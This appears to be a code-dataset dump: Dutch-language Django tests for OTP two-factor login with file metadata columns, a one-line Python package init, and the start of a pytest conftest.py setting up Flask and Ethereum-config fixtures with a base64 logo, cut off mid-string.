self.assertContains(resp, "Verkeerde code. Probeer het nog eens.")
# juiste otp code
code = get_otp_code(self.testdata.account_admin)
with self.assert_max_queries(25): # iets hoger ivm follow=True
resp = self.client.post(self.url_controle, {'otp_code': code}, follow=True)
self.assertEqual(resp.status_code, 200) # 200 = OK
self.assert_template_used(resp, ('functie/wissel-van-rol.dtl', 'plein/site_layout.dtl'))
# juiste otp code + next url
code = get_otp_code(self.testdata.account_admin)
with self.assert_max_queries(20):
resp = self.client.post(self.url_controle, {'otp_code': code, 'next_url': '/records/iets/'})
self.assertEqual(resp.status_code, 302)
self.assert_is_redirect(resp, '/records/iets/')
self.e2e_assert_other_http_commands_not_supported(self.url_controle, post=False)
def test_qrcode_te_groot(self):
# log in
self.testdata.account_admin.username = 'volledige_lengte_gebruikt_van_50_tekens__erg_lange'
self.testdata.account_admin.save()
self.e2e_login(self.testdata.account_admin)
with self.settings(OTP_ISSUER_NAME='erg_lange_otp_issuer_naam_van_50_tekens__erg_lange'):
# check mogelijkheid tot koppelen
with self.assert_max_queries(20):
resp = self.client.get(self.url_koppel_stap2)
self.assertEqual(resp.status_code, 200) # 200 = OK
self.assert_template_used(resp, ('functie/otp-koppelen-stap2-scan-qr-code.dtl', 'plein/site_layout.dtl'))
self.assert_html_ok(resp)
with self.assert_max_queries(20):
resp = self.client.get(self.url_koppel_stap3)
self.assertEqual(resp.status_code, 200) # 200 = OK
self.assert_template_used(resp, ('functie/otp-koppelen-stap3-code-invoeren.dtl', 'plein/site_layout.dtl'))
self.assert_html_ok(resp)
# end of file
| 44.829861
| 118
| 0.674386
| 1,708
| 12,911
| 4.862412
| 0.122365
| 0.078266
| 0.052258
| 0.063456
| 0.813606
| 0.783865
| 0.768573
| 0.75581
| 0.751716
| 0.746297
| 0
| 0.029658
| 0.213926
| 12,911
| 287
| 119
| 44.986063
| 0.788649
| 0.109442
| 0
| 0.666667
| 0
| 0
| 0.148692
| 0.101111
| 0
| 0
| 0
| 0.003484
| 0.53125
| 1
| 0.057292
| false
| 0.005208
| 0.026042
| 0
| 0.119792
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2496e10a59621ed9581833cd97a25d4397aa2bd8
| 38
|
py
|
Python
|
examples/my_package/__init__.py
|
jamesabel/sundry
|
4f63bfa0624c88a3cd05adf2784e9e3e66e094f4
|
[
"MIT"
] | 2
|
2019-10-02T06:30:27.000Z
|
2021-07-10T22:39:30.000Z
|
examples/my_package/__init__.py
|
jamesabel/sundry
|
4f63bfa0624c88a3cd05adf2784e9e3e66e094f4
|
[
"MIT"
] | 3
|
2019-03-13T17:15:58.000Z
|
2019-06-04T20:26:57.000Z
|
examples/my_package/__init__.py
|
jamesabel/sundry
|
4f63bfa0624c88a3cd05adf2784e9e3e66e094f4
|
[
"MIT"
] | 1
|
2019-03-08T21:37:29.000Z
|
2019-03-08T21:37:29.000Z
|
from .my_function import my_function
| 12.666667
| 36
| 0.842105
| 6
| 38
| 5
| 0.666667
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.131579
| 38
| 2
| 37
| 19
| 0.909091
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
24b2270d41597603a877636c2bd29cdd599156de
| 201,076
|
py
|
Python
|
tests/conftest.py
|
docknetwork/verifiable-claims-engine
|
1aab94510f421ce131642b64aefcd9a21c888f23
|
[
"MIT"
] | 5
|
2019-10-21T18:17:38.000Z
|
2020-12-09T06:40:32.000Z
|
tests/conftest.py
|
docknetwork/verifiable-claims-engine
|
1aab94510f421ce131642b64aefcd9a21c888f23
|
[
"MIT"
] | 4
|
2019-11-01T20:10:54.000Z
|
2020-01-21T20:41:00.000Z
|
tests/conftest.py
|
docknetwork/verifiable-claims-engine
|
1aab94510f421ce131642b64aefcd9a21c888f23
|
[
"MIT"
] | 2
|
2020-02-02T20:00:46.000Z
|
2020-02-12T10:12:05.000Z
|
import os
from collections import OrderedDict
from typing import Type, Dict, List
import flask.testing
import pytest
from attrdict import AttrDict
from flaskapp.app import create_app
from flaskapp.errors import AppError
from tests.helpers import JsonFlaskClient
class Response(object):
def __init__(self, code, data_dict):
self.status_code = code
self.json = lambda: data_dict
self.content = str(data_dict)
@pytest.fixture
def app():
app = create_app(
config_data={
'TESTING': True,
'DEBUG': True,
'BLOCKCHAIN': 'ethereum_ropsten',
'ETH_NODE_URL_ROPSTEN': os.environ.get('ETH_NODE_URL_ROPSTEN'),
'ETH_PUBLIC_KEY': os.environ.get('ETH_PUBLIC_KEY'),
'ETH_PRIVATE_KEY': os.environ.get('ETH_PRIVATE_KEY'),
'ETH_KEY_CREATED_AT': os.environ.get('ETH_KEY_CREATED_AT'),
'ETHERSCAN_API_TOKEN': os.environ.get('ETHERSCAN_API_TOKEN'),
}
)
yield app
@pytest.fixture
def json_client(client) -> JsonFlaskClient:
return JsonFlaskClient(client)
@pytest.fixture
def issuer() -> Dict:
yield AttrDict({
"name": "Verifiable",
"main_url": "https://verifiable.com",
"id": "https://gist.githubusercontent.com/faustow/643a48d909a095bbf08620ee392b8097/raw/c9acdf8f866f5a77382bedd606d9c0a084c8195c/test_issuer.json",
"email": "hello@verifiable.com",
"logo_file": "data:image/png;base64,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